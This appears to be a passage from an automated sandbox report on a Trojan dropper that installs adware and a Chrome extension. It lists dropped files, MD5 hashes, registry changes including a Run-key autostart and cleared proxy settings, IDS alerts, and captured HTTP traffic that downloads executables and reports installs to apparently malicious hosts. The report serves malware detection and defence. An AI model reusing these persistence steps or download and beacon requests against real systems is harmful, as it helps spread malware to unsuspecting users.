C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\xmlconfig (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\7zxr.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\img\letian.png (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\setting.json (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\build\background.js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\xmlconfig\uninstall.xml (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\htfixfunction.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\build\tap.js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\res (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\img\ebay.png (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\img\6pm.png (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\radio.png (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\progress_bar.png (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\uninst_complete.png (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\inst_successfully.png (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\DirectUI\scrollArrowUp.bmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\chromeNativeClient (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\menuButton.png (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\build (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\extensionWarn.js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\res\icon48_48.png (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\contentscript.js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\res\icon128_128.png (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\return.png (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\htwebHelper.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\box_check.png (0 bytes)

The process webfriend2.exe:2756 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-R6MIP.tmp\webfriend2.tmp (1429 bytes)

The process %original file name%.exe:3380 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\T7QO7T4H.txt (115 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\XSZEUUBG.txt (115 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\00026566\webfriend2.exe (144837 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\00026442\20002.exe (143808 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\00026403\msiql.exe (259462 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\00026383\20002.exe (143808 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\00026383\20002.exe (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\00026442\20002.exe (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\00026403\msiql.exe (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\XSZEUUBG.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\20002[1].exe (0 bytes)

The process webfriend2.tmp:2704 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\Leawo Commandision\is-KG2HA.tmp (16158 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-9H2MC.tmp\_isetup\_iscrypt.dll (6 bytes)
%Program Files%\Leawo Commandision\is-NV2MC.tmp (41 bytes)

The process msiql.exe:1660 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\swapfile.ini (208 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\00026416\popnew.xml (388 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\tmp1660aaaaaa (173 bytes)

The process msiql.exe:3536 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\swapfile.ini (104 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\tmp3536aaaaaa (173 bytes)

The process rundll32.exe:2532 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\Leawo Commandision\Leawo Commandision.dll (146 bytes)
%Program Files%\Leawo Commandision\954872365 (56 bytes)

Registry activity

The process %original file name%.exe:3380 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\fb0067556893d3d8bc2ead097f084722_RASMANCS]
"FileTracingMask" = "4294901760"
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\fb0067556893d3d8bc2ead097f084722_RASAPI32]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\fb0067556893d3d8bc2ead097f084722_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3C 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\fb0067556893d3d8bc2ead097f084722_RASMANCS]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\fb0067556893d3d8bc2ead097f084722_RASAPI32]
"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\fb0067556893d3d8bc2ead097f084722_RASMANCS]
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\fb0067556893d3d8bc2ead097f084722_RASMANCS]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\fb0067556893d3d8bc2ead097f084722_RASAPI32]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

The process msiql.exe:1660 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\PopWnd]
"InsTM" = "Type: REG_QWORD, Length: 8"

[HKCU\Software\PopWnd\actv]
"(Default)" = ""

[HKCU\Software\PopWnd]
"lastloadtime" = "Type: REG_QWORD, Length: 8"
"Days" = "3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3E 00 00 00 09 00 00 00 00 00 00 00"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"msiql" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\00026403\msiql.exe /RUNNING"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

The process msiql.exe:3536 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\msiql_RASAPI32]
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\PopWnd]
"TmN" = "12345"

[HKLM\SOFTWARE\Microsoft\Tracing\msiql_RASMANCS]
"EnableFileTracing" = "0"

[HKCU\Software\PopWnd]
"TmSN" = ""

[HKLM\SOFTWARE\Microsoft\Tracing\msiql_RASAPI32]
"MaxFileSize" = "1048576"
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\msiql_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\msiql_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\msiql_RASMANCS]
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3D 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\msiql_RASMANCS]
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\msiql_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\msiql_RASAPI32]
"FileTracingMask" = "4294901760"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"msiql" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\00026403\msiql.exe /RUNNING"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

Dropped PE files

MD5 File path
643c54452902067ca860c2a491703ddd c:\Program Files\Leawo Commandision\Leawo Commandision.dll
6adb4f8219a16f475ec87f8374cb3cdf c:\Users\"%CurrentUserName%"\AppData\Local\Temp\00026403\msiql.exe
0998bac5f58e6921165137b5dc3df38b c:\Users\"%CurrentUserName%"\AppData\Local\Temp\00026566\webfriend2.exe
45b2fb7d0db70157851fda33020978c2 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\20002.exe.dat
f481e9c92cf97beaa5e8ba1ab04c136c c:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\7zxr.dll
bd971559c7a8064ae73cdccef8163b55 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\HTDataView.dll
8411a40ac065f10788b77b23cfa4c5e5 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\HTDataView64.dll
169c0ec72d2d2932f3d5923c6559ad5c c:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\HTUninst.exe
b7cad4e4c5c29f712b592245947dbbd0 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\chromeNativeClient\chromeht.exe
9d755cd8c40f6ea4b2d7b3185df213cc c:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\haitao.exe
371efba5dc3dc61ae738c20beed33384 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\htfixfunction.dll
6a2db75c8e7a68aafc105ebb7dc15e2d c:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\htwebHelper.dll
a69559718ab506675e907fe49deb71e9 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-9H2MC.tmp\_isetup\_iscrypt.dll
832dab307e54aa08f4b6cdd9b9720361 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-R6MIP.tmp\webfriend2.tmp

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 1613496 1613824 4.49225 8da6ca91c3569ff080a4f75478f6c727
.rdata 1617920 381796 381952 3.57983 a55a6ae4b0df69ee40f231423b3e603d
.data 2002944 91284 41472 3.63295 64cdbcc120004f2897b19af1f755cd4e
.gfids 2097152 4644 5120 2.6637 6410b8af8276779b175e15c9c485139c
.tls 2105344 9 512 0.014135 1f354d76203061bfdd5a53dae48d5435
.rsrc 2109440 488 512 3.2941 7f05c3393a6996db4d22c7c37494fd2c
.reloc 2113536 82692 82944 4.57475 38ac4d6f998eb3534f0e7e0f3377be6c

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs



IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET MALWARE Double User-Agent (User-Agent User-Agent)
ET POLICY PE EXE or DLL Windows file download HTTP
ET TROJAN Suspicious User-Agent (Agent and 5 or 6 digits)
ET POLICY External IP Lookup sina.com.cn
ET POLICY Abnormal User-Agent No space after colon - Likely Hostile
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile

Traffic

GET /20002.exe HTTP/1.1
Accept: */*
User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: dl-o.1haitao.com




<<< skipped >>>

GET /reportInstallaa.aspx?ODI2Rjk2ODA4RUE1RjcyRDc3MkZBNUZBNjhBRjJBRUQ3RDA0Q0U4N0I5Nzg0QUQyQTk3RTc2N0RDRThDRkY1OEE1MkIwNURFRjg2Nzc4RDI1NzIyRUNGMjM1MUZFMTM3MDhDNzg5MTZDNjhDRUVFNTg3NjVDMkZBMjVFNDU5NjUwQ0VDRDVGQUM1OTk0RTgzMDlGRTlFMjNFNDE4Q0RBQUUwQzFENkMzMTFDQjM1MDZGNzI2OEE4NTM2RTFGN0Y2MzBDNjk4OTI0MjFCNUVFRTAxNkU1QzU1MTM1NkRBRTREODdFMUUyNjIwMUQ5RjNFMDFCQTkwQzgxQzVENkREODAxQ0U0RDVENThGOTJFNjVERjhGNzU2RjU1NzFEQkI5 HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Host: xiaobingdou.com


HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Wed, 16 Aug 2017 14:40:28 GMT
Connection: close
Content-Length: 0


GET /anzhuang.aspx?ODI2Rjk2ODA4RUE1RjcyRDc3MkZBNUZBNjhBRjJBRUQxNUY5M0U4RTk1NUQ5RTc2RTMyNDUxOUQ5RkI5Nzg5MkJDMTFDMTEyNDVDMjM0NEE4N0NDOEY3N0I1QjJFREEwQjc3NTBFNEY3Q0Q0QjhERUMyQTYyMERERjI3MzA3NEY= HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Host: xiaobingdou.com


HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Wed, 16 Aug 2017 14:40:31 GMT
Connection: close
Content-Length: 0


GET /reportInstallaa.aspx?ODI2Rjk2ODA4RUE1RjcyRDc3MkZBNUZBNjhBRjJBRUQ3RDA0Q0U4N0I5Nzg0QUQyQTk3RTc2N0RDRThDRkY1OEE1MkIwNURFRjg2Nzc4RDI1NzIyRUNGMjM1MUZFMTM3MDhDNzg5MTZDNjhDRUVFNTg3NjVDMkZBMjVFNDU5NjU4MTZEMEYzOTY3MkZCNkE5NUMzOUNDNkQxNTE2M0Q5NTlEQzMyNDg4N0VGRUE3Q0FBNEM5NTNERTQwNjlDMjYxMzMyQTY1NzhBODFENzAzMDc0NDM2QzQ0OUQwODc0QTZCRDcwMjM0OTAyQzY3NTY0MzBCMjYxMDBGQUQ5QkU5MTM2OTMxM0M1N0JBMkI1QzQ3QjkxOUM5NzNFNTg1NDI0 HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Host: xiaobingdou.com


HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Wed, 16 Aug 2017 14:40:37 GMT
Connection: close
Content-Length: 0


GET /get.aspx?url=hXXp://yeadesktopbr.com/ HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Host: pop.yeaplayer.com


HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Wed, 16 Aug 2017 14:40:39 GMT
Connection: close
Content-Length: 3030

<<< skipped >>>

GET /get.aspx?url=hXXp://qtipr.com/ HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Host: pop.yeaplayer.com


HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Wed, 16 Aug 2017 14:40:31 GMT
Connection: close
Content-Length: 3030

<<< skipped >>>

GET /get.aspx?url=hXXp://qtipr.com/ HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Host: pop.yeaplayer.com


HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Wed, 16 Aug 2017 14:40:30 GMT
Connection: close
Content-Length: 3030

<<< skipped >>>

GET /data/webfriend2.exe HTTP/1.1
User-Agent: Agent386664
Host: quadratempbayinfo.com
Cache-Control: no-cache


HTTP/1.1 302 Found
Location: exefiles/webfriend1502893460.exe
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Date: Wed, 16 Aug 2017 14:41:09 GMT
Accept-Ranges: bytes
Server: LiteSpeed
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Connection: Keep-Alive



GET /data/exefiles/webfriend1502893460.exe HTTP/1.1
User-Agent: Agent386664
Host: quadratempbayinfo.com
Cache-Control: no-cache
Connection: Keep-Alive


HTTP/1.1 200 OK
Last-Modified: Wed, 16 Aug 2017 14:24:28 GMT
Content-Type: application/x-msdownload
Content-Length: 1350814
Date: Wed, 16 Aug 2017 14:41:09 GMT
Accept-Ranges: bytes
Server: LiteSpeed
Connection: Keep-Alive

<<< skipped >>>

GET /reportInstallaaFinish.aspx?ODI2Rjk2ODA4RUE1RjcyRDc3MkZBNUZBNjhBRjJBRUQ3RDA0Q0U4N0I5Nzg0QUQyQTk3RTc2N0RDRThDRkY1OEE1MkIwNURFRjg2Nzc4RDI1NzIyRUNGMjM1MUZFMTM3MDhDNzg5MTZDNjhDRUVFNTg3NjVDMkZBMjVFNDU5NjU4MTZEMEYzOTY3MkZCNkE5NUMzOUNDNkQxNTE2M0Q5NUFDNTZFRUJDNEUyNTQzODNFODA2QjQ0RkMwRUE0RDE2NUQ0MUI0QjQwMDRCNUFFQzg4RTIzMkY5QTI5NTg4NTI3RjBGNzgyNjAxNkFCQTg1RkUwRjQ1MDdBQTY2QTM5RQ== HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Host: xiaobingdou.com


HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Wed, 16 Aug 2017 14:40:30 GMT
Connection: close
Content-Length: 0


GET /get.aspx?url=hXXp://yeadesktopbr.com/ HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Host: pop.yeaplayer.com


HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Wed, 16 Aug 2017 14:40:42 GMT
Connection: close
Content-Length: 3030

<<< skipped >>>

GET /offer/msiql.exe HTTP/1.1
Accept: */*
User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: down.yeadesktop.com
Cookie: __cfduid=d5306f411be5b94d33d9913bbc141529d1502894419


HTTP/1.1 403 Forbidden
Date: Wed, 16 Aug 2017 14:40:21 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=10
Expires: Wed, 16 Aug 2017 14:40:31 GMT
X-Frame-Options: SAMEORIGIN
Server: cloudflare-nginx
CF-RAY: 38f525f3a7b683f4-KBP

<<< skipped >>>

GET /jihuo.aspx?ODI2Rjk2ODA4RUE1RjcyRDc3MkZBNUZBNjhBRjJBRURBOTFGNTNDNDFBMEVDRDk0ODkwODc3NUMxMTJCQjU5QUIwODVGOEZBRkVBNEQ0NzdCNTFCNEU3MTE1NEMzOEJENTc0ODE3ODFDRjAxNDM3QTE2MTRGN0I5NEZERUJEQTRBM0I1N0M4NDI2RjU0RjE3MDU5OTkwNTQ3RTY0OTM2MTA3MjIyRkY1NjYwMzlDQzY0NDIxNUE4RDkxNTJGQ0Y5 HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Host: xiaobingdou.com


HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Wed, 16 Aug 2017 14:40:31 GMT
Connection: close
Content-Length: 0


GET /get.aspx?url=hXXp://VVV.yeadesktop.com/ HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Host: pop.yeaplayer.com


HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Wed, 16 Aug 2017 14:40:25 GMT
Connection: close
Content-Length: 3030

<<< skipped >>>

GET /reportInstallaaFinish.aspx?ODI2Rjk2ODA4RUE1RjcyRDc3MkZBNUZBNjhBRjJBRUQ3RDA0Q0U4N0I5Nzg0QUQyQTk3RTc2N0RDRThDRkY1OEE1MkIwNURFRjg2Nzc4RDI1NzIyRUNGMjM1MUZFMTM3MDhDNzg5MTZDNjhDRUVFNTg3NjVDMkZBMjVFNDU5NjUwQ0VDRDVGQUM1OTk0RTgzMDlGRTlFMjNFNDE4Q0RBQUVFMzdBRDBCQTFDQkU1QTVDN0ZGRTAyN0YxNTYwM0VDMTI3MzZCODNCQTgyQzM5RDJERjBDMDdENTUyODAyNjQxRTNGRTZDRjlEMDcxNzNCMTBFM0Q0RkJFNDYwRjE3Qg== HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Host: xiaobingdou.com


HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Wed, 16 Aug 2017 14:40:29 GMT
Connection: close
Content-Length: 0


GET /get.aspx?url=hXXp://qtipr.com/ HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Host: pop.yeaplayer.com


HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Wed, 16 Aug 2017 14:40:35 GMT
Connection: close
Content-Length: 3030
<html>..    <head>..        <title>Runtime Error<
/title>.. <style>.. body {font-family:"Verdana
";font-weight:normal;font-size: .7em;color:black;} .. p {font-
family:"Verdana";font-weight:normal;color:black;margin-top: -5px}..
b {font-family:"Verdana";font-weight:bold;color:black;margin-top
: -5px}.. H1 { font-family:"Verdana";font-weight:normal;font-s
ize:18pt;color:red }.. H2 { font-family:"Verdana";font-weight:
normal;font-size:14pt;color:maroon }.. pre {font-family:"Lucid
a Console";font-size: .9em}.. .marker {font-weight: bold; colo
r: black;text-decoration: none;}.. .version {color: gray;}..
.error {margin-bottom: 10px;}.. .expandable { text-deco
ration:underline; font-weight:bold; color:navy; cursor:hand; }..
</style>.. </head>.. <body bgcolor="white">.
. <span><H1>Server Error in '/' Application.<
;hr width=100% size=1 color=silver></H1>.. <h2&
gt; <i>Runtime Error</i> </h2></span>..
<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-se
rif ">.. <b> Description: </b>An application
error occurred on the server. The current custom error settings for t
his application prevent the details of the application error from bein
g viewed remotely (for security reasons). It could, however, be viewed
by browsers running on the local server machine... <

<<< skipped >>>

GET /get.aspx?url=hXXp://qtipr.com/ HTTP/1.1
Content-Length: 0
Connection: Close
